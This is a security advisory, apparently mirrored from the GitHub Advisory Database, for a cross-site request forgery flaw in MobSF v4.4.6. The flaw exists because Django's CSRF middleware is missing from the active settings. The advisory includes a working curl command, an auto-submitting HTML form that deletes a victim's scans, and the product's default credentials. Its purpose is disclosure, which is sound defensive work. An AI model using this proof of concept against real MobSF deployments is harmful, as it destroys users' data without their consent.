mediumCVSS 6.5Vulnerability

CVE-2026-68923

### Summary Django's `CsrfViewMiddleware` exists only in the deprecated `MIDDLEWARE_CLASSES` (ignored since Django 2.0). The active `MIDDLEWARE` tuple does not include it. All authenticated web POST endpoints (delete scan, upload, download APK, change password, manage users) accept requests without CSRF tokens. ### Verified Impact This was verified by **actually deleting a real scan** from the running server using only a session cookie — no CSRF token was required: ``` $ curl -s -b cookies.txt -X POST "http://127.0.0.1:8000/delete_scan/" \ -d "md5=68e76627798d62555d5287f4488a32c7&scan_type=apk" {"deleted": "yes"} ``` The scan was removed from the database. This attack works from any website via HTML form auto-submission because: - **No CSRF token is validated** (middleware absent) - **Cookie `SameSite=Lax`** allows form-based top-level navigation to send the session cookie ### Affected Component ``` File: mobsf/MobSF/settings.py (Lines 206-212) MIDDLEWARE = ( 'mobsf.MobSF.views.api.api_middleware.RestApiAuthMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', # MISSING: 'django.middleware.csrf.CsrfViewMiddleware' ) ``` ### Steps to Reproduce **1.** Start MobSF v4.4.6 and log in at `http://127.0.0.1:8000/login/` (creds: `mobsf/mobsf`). **2.** Upload and scan any APK to create a scan entry. Note the MD5 hash from "Recent Scans". **3.** Open the following HTML file in the **same browser** (simulates visiting attacker's page): ```html <!DOCTYPE html> <html> <head><title>Innocent Page</title></head> <body> <h1>Loading...</h1> <form id="f" method="POST" action="http://127.0.0.1:8000/delete_scan/"> <input type="hidden" name="md5" value="PUT_REAL_MD5_HASH_HERE" /> <input type="hidden" name="scan_type" value="apk" /> </form> <script>document.getElementById('f').submit();</script> </body> </html> ``` **4.*

Properties

ghsa_id
GHSA-3p54-567p-2wpr
severity
medium
summary
MobSF's CSRF checks not enforced after Django migration
cvss_score
6.5
cve_id
CVE-2026-68923
cvss_vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
is_ghsa_only
false
ghsa_published
2026-08-18T18:01:13Z
source_url
https://github.com/advisories/GHSA-3p54-567p-2wpr
ghsa_updated
2026-08-18T18:01:14Z

Related Entities (4)

VULNERABLE_TO (1)

[Software]pip/mobsf

AFFECTS (1)

[Software]pip/mobsf

HAS_WEAKNESS (1)

[Weakness]Cross-Site Request Forgery (CSRF)

REPORTED_BY (1)

[Source]GitHub Advisory Database

Explore deeper with Ninja Signal's threat intelligence graph